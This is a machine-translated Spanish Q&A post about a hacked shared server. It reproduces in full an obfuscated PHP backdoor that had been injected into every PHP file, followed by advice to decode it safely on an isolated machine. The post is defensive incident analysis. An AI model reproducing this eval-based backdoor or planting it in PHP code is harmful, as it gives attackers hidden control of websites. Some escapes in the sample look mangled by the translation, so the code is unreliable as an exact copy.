¿Necesita ayuda para desofuscar PHP malicioso?

Question

¿Necesita ayuda para desofuscar PHP malicioso?

#1 de gowenfawr (2 votos)

2

Recientemente tuve un servidor de alojamiento compartido que fue hackeado; la siguiente línea de código se inyectó en la parte superior de cada archivo PHP en el servidor:

<?php if(!isset($GLOBALS["\x616\x756\x61"])) { $ua=strtolower($_SERVER["\x484\x540\x5f5\x535\x527\x417\x456\x54"]); if ((! strstr($ua,"\x6d3\x695")) and (! strstr($ua,"\x726\x3a\x31"))) $GLOBALS["\x616\x756\x61"]=1; } ?><?php $pyyhlxfwxr = '!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;!osvufs}w;*%x5c%x78%x5c%x78257UFH#%x5c%x7827rfs%x5c%x78256~6<%x5c%x787fw6<*K)ftpmdX%x7825)m%x5c%x7825):fmji%x5c%x7878:5%x5c%x7824-%x5c%x7824-!%x5c%x7825%x5c%x782)#]341]88M4P8]37]278]225]241]334]36vg}k~~9{d%x5c%x7825:osvufs:~928>>%x5c%x7822:ftmbg39*56A:>:8:60SFTV%x5c%x7860QUUI&b%x5c%x7825!|!*)323zbek!~!<b%860opjudovg)!gj!|!*msv%x5c%x787825j:,,Bjg!)%x5c%x7825j:>>1*!%x5c%x7825b:>!%x5c%x7825ww2)%x5c%x78251]y33]68]y34]68]y33]824)#P#-#Q#-#B#-#T#-#E#-{hA!osvufs!~<3,j%x5c%x7825>166%x61%154%x28%151%x6d%160%x6c%157%x64%145%x28%141%x72%1U,6<*27-SFGTOBSUOSVUFS,6<*x7825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x78255fdy>#]D4]273]D6P2L5%x5c%x7825fdy)##-!#~<%x5c%x7825h00#*<%x5c%x7825nfd)##QtpzpV%x5c%x787f%x5c%x787f%x5c%x787f%x5c%x787f<u%x5c%x7825 fjfgg($n){return chr(ord($n)-1);} @error_repo5)}.;%x5c%x7860UQPMSV25i%x5c%x785c2^<!Ce*[!%x5c%x7825cIjQeTQc5-#jt0}Z;0]=]0#)2q%x5c%x7825l}S;2-u%x5c%x7825!-#2#%x5c%x782f#y%x5c%x7825,3,j%x5c%x7825>jx5c%x7824y7%x5c%x7824-%x5c%x7824*<!%x5c%x7824-%x5c%x7824gps25)fnbozcYufhA%x5c%x78272qj%x5c%x78256<^#zsfvc%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y3:]68]y76#<%x5c%x#M5]DgP5]D6#<%x5c%x7829%73", NULL); }6197g:74985-rr.93e:5597f-s.973:c%x785c}X%x5c%x7824<!%%x7825w6Z6<.2%x5c%x7860hA%x5c%x7827pd%x5c%x78256<C%x5c%x7827pd%x5x5c%x7825s:%x5c%x785c%x5c%x7825j:^<!%x5c%x7825w%x5c%x7860%xy>#]D6]281L1#%x5c%x782f%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x78%x7824]26%x5c%x7824-%x5c%x7824<%x5c%x7825j,,*!|%x5c%x7824-%x5x5c%x7860ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%x782x5c%x787f!|!*uyfu%x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%x7865]y31]53]y6d]281]y43]78]y33]65]y31]55]y85]82]y76]62]y3:]84#-!OV78W~!Ypp2)%x5c%x7825zB%x5c%x7825z>!!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%yfA>2b%x5c%x7825!<*qp%x5c%x7825-*.%x5c%x7825)euhA)3of25)gpf{jt)!gj!<*2bd%x5c%x7825-#1GO%x5c%x7822#)fepmq%x7825)ftpmdR6<*id%x5c%x7825)dfyfR%x5c%x7827tfsf5d816:+946:ce44#)zbssb!>!ss6~6<&w6<%x5c%x787fw6*CW&)7gj6<*doj%x5c%x78257-C)j%x5c%x7825!*3!%x5c%x7827!hmg%x5c%x7825!)!gj!<2,*j%x5c%x7825!-#1-tusqpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>!tus%x5c%x7860sfqmbdf)%5!|!*!***b%x5c%x7825)sf%x5c%msv%x5c%x78257-MSV,6<*)ujojR%x5c%x7827id%x5c323ldfid>}&;!osvufs}%x5c%x787f;!opjudo825tww!>!%x5c%x782400~:<h%x5c%x7825_t%x5c%x7825:osvc%x7825yy)#}#-#%x5c%x7824-%x5c%x7824%x5c%x7825!<**3-j%x5c%x7825-bubE{h%x5c%x7825)cnbs+yfeobz+sfwjidsb%xMM*<%x22%51%x29%51%x2H,2W%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%x7825rN}#|:7#6#)tutjyf%x5c%x7860439275ttfsqnr%x5c%x7878Bsfuvso!sGLOBALS["%x61%156%x75%156%x61"]=1; function%x782f7#@#7%x5c%x782f7^#iubq#%x5c%x785cq7825V<#65,47R25,d7R17,67R37,#%x5c%x782fq%x5c%x7825>Uc%x7824<!%x5c%x7825o:!>!%x5c%x78242178}527}88:}334}4%x5c%x7825t2w>#]y74]273]y76]252]y85]256]y6g]257]y86]267]y74]2751<!fmtf!%x5c%x7825b:>%x5c%x7825s:%x5c%x785c%x5c%x7825j:.2^,%xy7d]252]y74]256#<!%x5c%x7825ff2!>!bssbz)%x5c%x7824]2M*<(<%x5c%x78e%x5c%x78b%x5c%x7825ggg!>!#]y81]273tfs%x5c%x7825w6<%x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*id%x5c34]342]58]24]31#-%x5c%x7825tdz*Wsfuvso!%x5c%x7825bss%x5c%x785csboe))1r#%x5c%x785cq%x5c%x78257%x5cx5c%x7825tzw>!#]y76]277]y72]265]y39]274]y85]273]y6g]273]y76]271]y75c%x7827!hmg%x5c%x7825)!gj!|!*1?hmg%x5c%x782787f_*#[k2%x5c%x7860{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuo7825h!>!%x5c%x7825tdz)%x5c%x7825bbT-%x5c%x7825bT-%x5c%x7825hW~f%163%x74%141%x72%164"22)gj!|!*nbsbq%x5c%x7825x7827*&7-n%x5c%x7825)utjm6<%x5c%x787fw6*CW&)7gj6<*K)ftpmdXA6~6<u%x5c%!#0#)idubn%x5c%x7860hfsq)!sp!*#ojneb#-*f%x5c%x7825)sf%x5c3]238M7]381]211M5]67]452]88]5]48]32M3]317]445]212]44fubmgoj{h1:|:*mmvo:>:iuhofm%x5c%x7825:-5fepmqnjA%x5c%x7827&6<.fmjjyf%x5c%x7860opjudovg%x5c%x7822)!gj}1~!<2p%x860FUPNFS&d_SFSFGFS%x5c%x7860QUUI&c_UOFHB%x5c%x78%x5c%x7825#%x5c%x782f#o]#%x5c%x782f*)323zbe!-#jt0*?]+^?]_%x5e{h+{d%x5c%x7825)+opjudovg+)!gj+A6|7**197-2qj%x5c%x782562%x61%171%x5f%155%x61%160%x28%42%x66%152%x66%147%x67%42%x2c%163%x74%1tussfw)%x5c%x7825zW%x5c%x7825h>Ez>%x5c%x782272qj%x5c%x7825)7gj6<**2r%x5c%x7825:|:**t%x5c%x7825)m%x5c%x7825=*h%x5cx5c%x7825)sutcvt)!gj!|!*bubE{h%x5-%x5c%x7825hOh%x5c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82#-#!#-%x527u%x5c%x7825)7fmji%x5c%x78786<C%x5c%x7827&6<*rfs%x5c%x78257-K)fu5c%x7824tvctus)%x5c%x7825%x5c%x7824-%x5c%x7824b!>!%x5%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.4%x5cbnpe_GMFT%x5c%x7860QIQ&f_UTPI%x5c%x7860QUUI&e_SEEB%x5c%x7#zsfvr#%x5c%x785cq%x5c%x7825%x5c%x78256<*17-SFEBFI,6<*127-UVPFNJgj<*#k#)usbut%x5c%x7860cepn)%x5c%x7825bss-%x5c%x78w%x5c%x7860TW~%x5c%x7824<%x5c%x78e%x5c%x78b%x5c%x7825mm)%x5c%x7825%x7825j:>1<%x5c%x7825j:=t53]Kc]55Ld]55#*<%x5c%x7825bG9%x782f#@#%x5c%x782fqp%x5c%x7825>5h%x5c%x7825!<*::5c%x7825%x5c%x787f!~!<##!>!2p%x{e%x5c%x7825!osvufs!*!+A!>!{e%x5c%x7825)!>>%x5c%x7822!ftmbg)!#>.%x5c%x7825!<***f%x5c%x7827,*e%x5c%x7827,*d%x5c%x7827,*c%x5c%4-%x5c%x7824*!|!%x5c%x78245c%x785c^>Ew:Qb:Qc:W~!%x5c%x7825z!>2<!5c%x7825Z<#opo#>b%x5c%x7825!*##>>X)!gjZ<#opo#>78e%x5c%x78b%x5c%x7825w:!>!%x5c7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*#cd2bge56+99386c6f+9c%x7825cB%x5c%x7825iN}#-!tussfw)%x5c%x7825c*W%x5c%x7825eN)ufttj%x5c%x7822)gj6<^#Y#%x5c%x785cq5c%x7825t::!>!%x5c%x7824Ypp3)%x55c%x7825b:<!%x5c%x7825c:>%]28y]#%x5c%x782fr%x5c%x7825%x5c%xx78257>%x5c%x782f7&6|7**111127-K)ebfsX%x5c%x78c%x7825!-uyfu%x5c%x7825)3of)fepdof%x5c%x786057ftbc%x5c%x7825c:>1<%x5c%x7825b:>1<!gps)%x5cf+*0f(-!#]y76]277]y72]265]y39]271]y83]2}!+!<+{e%x5c%x7825+*!*+fepdfy]572]48y]#>m%x5c%x7825:|:*r%x5c%x7825:-t%x5c%x7825)3of:opjudovg<~%x5825tzw%x5c%x782f%x5c%x7-bubE{h%x5c%x7825)sutcvt)fubmgoj~!dsfbuf%x5c%x7860gvodujpo)##-!#~<#%x5c%<##:>:h%x5c%x7825:<#64y]552]e7y]#>n%x5c%x7825<#372]58y]472]37y]]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#%x5c%x782f#7e:55946-t%x78256<%x5c%x787fw6*%x5c%x787f_*#ujojRk3%x5c%x7860{666~6<&w6<%x62%x5f%163%x70%154%x69%164%50%x2225)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%x5c%x7825%x5c%x7825%x5c%x7827jsv%x5c%x78256<C>^#zsfvr#%x5cD2P4]D6#<%x5c%x7825G]y6d]281Ld]245]K2]285]Ke]53Ld]%x78246767~6<Cw6<pd%x5c%x7825w6Z6<.5rting(0); preg_replace("%x2f%50%x2e%52%x29%57%x65","%x65%d]252]y74]256]y39]252]y83]273822l:!}V;3q%x5c%x7825}U;y]}R;2]},;osvufs}%x5c%x7827;mnui}&;zepcboepn)%x5c%x7825epnbss-%x5c%x7825r%x5c%x78x7878pmpusut!-#j0#!%x5c%x782f!**#sfmc%x7824gvodujpo!%x5c%x7824-%}:}.}-}!#*<%x5c%x7825nfd>%x5c%x7825fdy<Cb*[%x5c%x%x7825-qp%x5c%x7825)54l}%x5c%x7827;%x5c%x7825!<*#}_;#)782fh%x5c%x7825)n%x5c%x7825-#+I#)q%x5c%x7825:>:%x7878pmpusut)tpqssutRe%x5c%x::::-111112)eobs%x5c%x7860un>qp%x5V%x5c%x7827{ftmfV%x5c%x787f<*X&Z&S{fpo#>>}R;msv}.;%x5c%x782f#%x5c%x782f#%x5c%x782f},;#-#}+;%x5c)%x5c%x7825j>1<%x5c%x7c%x7825)j{hnpd!opjudovg!|!**#j{hnpd#)tut]y7:]268]y7f#<!%x5c%x7%x5c%x7878:-!%x5c%x7<#16,47R57,27R66,#%x5c%x782fq%x5c%x7825>2q%xgps)%x5c%x7825j>1<%x5c%x7825j=6[%x5c%x7825wpef)#%x5c%x7824*<!%x5c%x7825kj:!>!#]y3d]#D#-#W#-#C#-#O#-#N#*%x5c%x7824%x5c%x782f%x5c%x7825kj:-!OVM75]y83]273]y76]277#<w6*%x5c%x787f_*#fmjgk4%x5c%x7860{6~6<5c%x782f#0#%x5c%x782f*#npd%x5c%x782f#)rrd%x5c%x782f#00;quui82f2986+7**^%x5c%x782f%x5c%x7825r%x5c%xc%x78256|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf%x5c%25w6Z6<.3%x5c%x7860hA%x5*!%x5c%x7825z>3<!fmtf!%x5c%x7825z>2<]y76]258]y6g]273]y76]271]y7d]252]y74]256#<!%5c%x7824-%x5c%x7824]y8%x5c%x7824-%x5c7-K)udfoopdXA%x5c%x7822)7gj6<*QDU%x5c%x7860MPT7-NBFSUT%x5c%x7860LDPT7-UFOJ%x5c%x7860GB)fubf7860msvd},;uqpuft%x5c%x7860msvd}+;!>!}%x5c%x7827;!>>>x7827,*b%x5c%x7827)fepdof.)fepdof.%x5c%x785cq%x5c%x78257**^r.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]x5c%x7825%x5c%x787f!<X>b%xif((function_exists("%x6f%142%x5j{fpg)%x5c%x7825s:*<%x5c%x) && (!isset($GLOBALS["%x61%156%x75%156%x61"])))) { $x5c%x7825%x5c%x7824-%x5c%x7824y4%xsutcvt-#w#)ldbqov>*ofmy%x5c%x7825)utjm!|!*5!%xD!-id%x5c%x7825)uqpuft%x5c%x5)s%x5c%x7825>%x5c%x782fh%5c%x787fw6*CW&)7gj6<.[A%x5c%x7827&6<%x5c%x787fw6*%x5c%x5c%x7825<#g6R85,67R37c%x7825!|Z~!<##!>!2p%x5c%x78253]Kc#<%x5c%x7825tpz!>!#]D6M7]K3#<%x5c%x7825yb%x5c%x7825!**X)ufttj%x5c%x78)323ldfidk!~!<**qp%x5x5c%x7825)kV%x5c%x7878{**#k#)tutjyf%x5c%x7860%x5c%x7878%x5c%x7256]y81]265]y72]254]y76#<%x5c%x7825tmw!>!#]y84]2]y72]282#<!%x5c%x7825tjw!>!#]y84]275]y83]248]y83]qj%x5c%x7825)hopm3qjA)qj3hopmA%x5c%x78273qj%x5c%x78256<*Y%x5c%x785c%x7825Z<^2%x5c%x785c2b%x5c%x7825!>!2p%x5c%x7825!*3>?*2b%x5c%x78672]48y]#>s%x5c%x7825<#462]47y]252]18y]#>q%x5c%x7825<#762]67y]562]3851]y35]256]y76]72]y3d]51]y35]274]y4:]82]y3:]62]y4c#<!%x%x5c%x782f35.)1%x5c%x782f14+9**-)1%x5c%x7%x5c%x7825%x5c%x7827Y%x5c%x78256<.msv%x5c%x7860ft%134%x78%62%x35%165%x3a%146%x21%76%x21%50%x5,18R#>q%x5c%x7825V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*w%7878<~!!%x5c%x7825s:N}#-%x5c%x7825o:W%8297f:5297e:56-%x5c%x7878r.985:52985-t.98]K45c%x7860bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!%x5c%x782fc%x7825tmw)%x5c%x7825tww**WYsbogA%x5c%x7827doj%x5c%x78256<%x5c%x787fufs:~:<*9-1-r%x5c%x782ppde:4:|:**#ppde#)tutjyf%x5c%x78604%x5c%x78223c%x7827pd%x5c%x78256<pd%x5c-%x5c%x7824%x5c%x785c%x5c%x7825j^%x5c%x7824-%xx5c%x7825:<**#57]38y]47]67y]37]88y]27#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-x5c%x782f7rfs%x5c%x78256<#o]1%x5c%x782f20QUUI7jsv}A;~!}%x5c%x787f;!|!}{;)g!*72!%x5c%x7827!hmg%x5c%5)!gj!<**2-4-bubE{h%x5c%x7825)sutcvt)esp>hmg%x5c%x7825!<12>j%x5c%x782556]y78]248]y83]256]y81]265]y72]254]y76]6P6]y6gP7L6M7]D4]275]D:M8]Df#<%x5c%x7825tdz>#L4]275L3]248L3P6L1M5]fuopd%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%x5c%x7825}K;%Oc%x5c%x782f#00#W~!Ydrr)%x5c%x7825QwTW%x5c%x7825hIr%x5c%x785c1^-%x5c%x7825r%x5c%x785c2^pdov{h19275j{hnpd19275!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ofm5]43]321]464]284]364]6]27f!>>%x5c%x7822!pd%x5c%x7825)!gj}Z;h!opjudovg}{;#)tutjyf%x5c%x7]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825j}l;33bq}k;opjudovg}%x5c%x7878;0]=])0#)U!%x5c%x7827{**u%x5c%x78225r%x5c%x7878B%x5c%x7825h>#]y31]278]y3e]81]K78:56985:25%x5c%x785cSFWSFT%x5c%x7860%x5c%x7825}X;!sp!*#otmfV%x5c%x787f<*XAZASV<*w%x5c%x7825)ppde>u%x5c%xjs%x5c%x7878X6<#o]o]Y%x5c%x78257;utpI#7>%sbqA7>q%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fubfsdXk5%x5c%x7860{6825j=tj{fpg)%x5c%x7825%x5c%x7824-%x5c%x7824*<!x782f%x5c%x7825%x5c%x7824-%x5c%x7824!>!fyqm+#Qi%x5c%x785c1^W%x5c%x7825c!>!%x5c%x78>2bd%x5c%x7825!<5h%x5c%x7825%xsdXA%x5c%x7827K6<%x5c%x787fw6*3qj%x5c%x78257w2!>#p#%x5c%x782f#p#%x5c%x782f%x5c%x7825z<jg!)%x5c%x7825z>>28]322]3]364]6]283]427]36]373P6]36]73]8x5c%x7825ggg)(0)%x5c%x78272%x5c%x7824<!%x5c%x7825mm!>!#]y81]273]y76]258]y6g]273]y76]271]/(.*)/epreg_replaceofqxosjrru'; $peyjqdmyjs = explode(chr((183-139)),'7333,32,3252,22,7391,53,2462,43,792,46,5856,57,512,57,3749,48,3797,22,5642,33,8280,44,1091,54,4812,31,5820,36,4148,59,1382,42,6915,24,8658,27,1235,65,6863,52,3298,69,5085,46,4030,65,9611,41,8800,49,56,64,3726,23,7056,37,7093,54,9876,44,3852,34,7937,65,1046,45,2999,28,2505,40,5721,49,7238,21,4264,28,4958,36,8231,49,9652,66,1895,48,3516,25,8553,37,6728,37,2873,57,1820,47,4292,36,569,26,2105,44,5578,64,7578,55,3137,53,9073,53,1485,48,838,21,7524,28,7147,53,0,56,9297,63,343,30,5675,46,5379,32,485,27,1943,64,9360,38,8874,24,595,66,9235,38,960,27,2274,45,7478,46,3093,44,8898,70,1684,32,3932,33,6441,40,3541,44,4547,31,8002,65,1769,51,1716,53,9846,30,6765,59,4639,63,7200,38,4498,49,6290,34,7654,29,2077,28,6047,36,2319,22,8461,61,3367,57,6261,29,4843,58,1867,28,4207,57,3585,49,293,50,7307,26,4766,46,7728,29,3274,24,7757,21,5131,51,1533,52,9515,48,6360,59,6160,54,2149,38,233,60,2407,35,9213,22,3476,40,8612,46,5259,28,3694,32,4578,61,4328,24,738,54,6324,36,9563,48,2545,52,6523,44,7633,21,8324,55,7778,62,5942,63,8849,25,9398,64,899,61,3634,60,1213,22,3027,66,5913,29,7888,49,7840,48,6708,20,2649,63,6481,22,2187,51,8590,22,7552,26,8731,37,5052,33,6214,47,3886,46,120,35,5451,63,8067,68,5287,69,2597,52,10043,63,2773,52,155,43,4702,26,8685,46,4095,53,2238,36,2007,70,7444,34,7019,37,1424,61,6083,28,987,59,6419,22,9718,46,5411,40,9764,43,6610,40,8135,55,4994,32,4901,57,9807,39,859,40,9126,34,2442,20,6005,42,1649,35,3819,33,2362,45,9160,53,3965,65,8522,31,4352,26,9462,53,1182,31,8417,44,5514,64,7259,48,7683,45,1359,23,1145,22,661,20,9008,65,5770,50,4469,29,6111,49,3190,62,681,57,198,35,9980,38,3424,52,9273,24,2930,69,8190,41,6824,39,8379,38,5182,38,4444,25,7365,26,373,43,2712,61,5026,26,1300,59,4728,38,6567,43,9920,60,6939,36,416,25,4378,66,6503,20,5356,23,461,24,8768,32,6650,58,2825,48,6975,44,10018,25,5220,39,8968,40,441,20,1585,64,2341,21,1167,15'); $rcwmfpxjbs=substr($pyyhlxfwxr,(63563-53457),(37-30)); if (!function_exists('djbxmtkyiw')) { function djbxmtkyiw($siiigmplqz, $jcodtyjdch) { $vqvamvvnqx = NULL; for($ttgvvqxcls=0;$ttgvvqxcls<(sizeof($siiigmplqz)/2);$ttgvvqxcls++) { $vqvamvvnqx .= substr($jcodtyjdch, $siiigmplqz[($ttgvvqxcls*2)],$siiigmplqz[($ttgvvqxcls*2)+1]); } return $vqvamvvnqx; };} $odgmnprvdj="\x20\x2a\x726\x6b0\x735\x6e3\x713\x20\x2f\x656\x614\x283\x742\x5f2\x650\x6c1\x635\x283\x682\x28\x32\x37\x32\x30\x29\x203\x682\x28\x33\x31\x32\x39\x29\x204\x6a2\x785\x743\x791\x77\x240\x651\x6a1\x645\x792\x73\x240\x791\x684\x786\x770\x72\x29\x3b\x2f\x204\x6f4\x711\x610\x786\x65\x2a\x20"; $pjegxnbdlt=substr($pyyhlxfwxr,(31614-21501),(70-58)); $pjegxnbdlt($rcwmfpxjbs, $odgmnprvdj, NULL); $pjegxnbdlt=$odgmnprvdj; $pjegxnbdlt=(391-270); $pyyhlxfwxr=$pjegxnbdlt-1; ?>

Por supuesto, estoy en el proceso de desconectar el servidor e intentar descubrir cómo fue pirateado, pero me gustaría saber qué hace este código PHP. Cuando visito las páginas pirateadas y veo la fuente, nada parece fuera de lo común; No parece estar poniendo nada visible para los visitantes en las páginas pirateadas. Los desobuscadores en línea que probé fallaron con esta muestra, aunque mi escáner de virus lo detecta como una puerta trasera. ¿Alguna idea?

system-compromise

pregunta tlng05 24.03.2015 - 03:57

fuente

1 respuesta

Lea otras preguntas en las etiquetas system-compromise

¿Por qué WPA2 necesita un protocolo de enlace de 4 vías? ¿Debo actualizar mi paquete openSSL? [cerrado]

score 2 · Answer 1

Hex decoder limpiará la \ x crap, lo que ayuda, pero para descifrar el resto que necesitas para ejecutarlo en PHP , porque está diseñado para decodificarse. Si cuidadosamente separa las declaraciones allí y las ejecuta una por una, y tenga cuidado de nunca ejecutar una 'eval' o algo así (reemplace 'eval' con 'imprimir' para ver cuál es el código del programa descifrado, luego decide si es seguro correrlo.

No recomiendo hacerlo a menos que tengas algo de conocimiento de PHP y una estación de trabajo desechable que sea fuera de la red y que puedas < fuerte> limpiar luego . Y es un proyecto suficientemente ambicioso que no me molestaría; no necesitas hacer todo eso para saber que es un malcode.

Si solo tienes curiosidad, entonces eso es diferente. Que te diviertas. Pero descodificarlo es un ejercicio de programación sencillo, y es posible que obtengas una mejor ayuda en otras pilas.